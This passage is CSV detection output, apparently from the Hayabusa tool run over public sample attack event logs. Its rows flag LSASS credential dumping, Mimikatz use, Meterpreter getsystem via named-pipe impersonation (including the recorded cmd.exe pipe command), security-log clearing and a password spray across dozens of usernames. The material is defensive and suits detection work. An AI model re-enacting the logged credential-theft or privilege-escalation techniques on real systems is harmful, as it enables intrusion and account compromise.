05:59:22.144 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:22.144 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:22.144 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:55.472 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 16:23:00.883 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:46:15.215 +09:00,IEWIN7,1,informational,Process Creation,Command: cmd.exe /c echo msdhch > \\.\pipe\msdhch : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx +2019-04-30 16:46:15.215 +09:00,IEWIN7,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx +2019-04-30 16:46:15.215 +09:00,IEWIN7,1,high,Meterpreter or Cobalt Strike Getsystem Service Start,,rules/sigma/process_creation/win_meterpreter_or_cobaltstrike_getsystem_service_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,8,high,Password Dumper Remote Thread in LSASS,,rules/sigma/create_remote_thread/sysmon_password_dumper_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,8,high,Password Dumper Remote Thread in LSASS,,rules/sigma/create_remote_thread/sysmon_password_dumper_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-05-01 03:08:22.618 +09:00,Sec504Student,1102,high,Security log was cleared,User: Sec504,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe : User: Sec504 : LogonID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe : User: Sec504 : LogonID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe : User: Sec504 : LogonID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe : User: Sec504 : LogonID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 04:27:00.297 +09:00,DESKTOP-JR78RLP,1102,high,Security log was cleared,User: jwrig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:02.847 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:02.847 +09:00,-,-,medium,Password Spray,[condition] count(TargetUserName) by IpAddress >= 5 in timeframe [result] count:41 TargetUserName:cspizor/bgreenwood/baker/dpendolino/melliott/cfleener/sarmstrong/sanson/lpesce/wstrzelec/drook/thessman/mtoussain/jorchilles/ssims/bhostetler/dmashburn/edygert/cmoody/tbennett/cdavis/zmathis/eskoudis/jleytevidal/jwright/bgalbraith/psmith/lschifano/celgee/kperryman/bking/cragoso/rbowes/jkulikowski/jlake/econrad/smisenar/mdouglas/gsalinas/Administrator/ebooth IpAddress:172.16.144.128 timeframe:5m,rules/hayabusa/default/alerts/Security/4648_BruteForce_PasswordSprayDetect.yml,- +2019-05-01 04:27:03.925 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:05.020 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:06.085 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:07.171 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:08.254 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:09.323 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:10.377 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:11.465 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:12.549 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:13.611 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:14.687 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:15.750 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:16.841 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: 